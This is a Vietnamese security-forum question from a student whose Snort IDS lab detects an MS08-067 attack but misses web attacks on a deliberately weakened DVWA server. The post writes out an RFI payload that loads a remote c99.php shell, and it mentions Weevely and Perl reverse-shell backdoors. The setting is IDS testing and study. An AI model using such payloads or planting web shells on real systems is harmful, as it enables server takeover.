banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận bảo mật Snort IDS không phát hiện xâm nhập  XML
  [Question]   Snort IDS không phát hiện xâm nhập 22/03/2014 13:49:58 (+0700) | #1 | 280089
KardelSharpeye
Member

[Minus]    0    [Plus]
Joined: 13/06/2012 10:28:51
Messages: 1
Offline
[Profile] [PM]
Chào các anh chị,
Em đang làm đề tài về snort IDS đã cài đặt snort+ base baryard2 theo hướng dẫn http://www.snort.org/assets/158/snortinstallguide293.pdf và pulledpork để tự động cập nhật rules đã thành công.

Kiểm tra thử khi tấn công lỗi MS067_08netapi thì snort cảnh báo
Nhưng khi kiểm tra phần web attack thì snort ko hiện cảnh báo nào hết.
Phần web em cài dvwa trên webserver, chỉnh sửa allow_url_include=On trong file /etc/php5/apache2/php.ini chmod 777 /var/www/dvwa/hackable/uploads
Sử dụng tấn công RFI thực thi shell c99.php: ?page=http://ipaddress/c99.php
với trong phần upload có upload các file backdoor: Weevely, sử dụng Perl Reverse Shell các kiểu
Tất cả đều attack thành công nhưng snort ko phát hiện được tấn công. Chỉ phát hiện mỗi tấn công windows XP
Em tìm trong rules vẫn thấy có malware C99 nhưng ko hiểu sao snort ko detect được.
Mong các anh chị tư vấn giúp. Em cảm ơn

[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|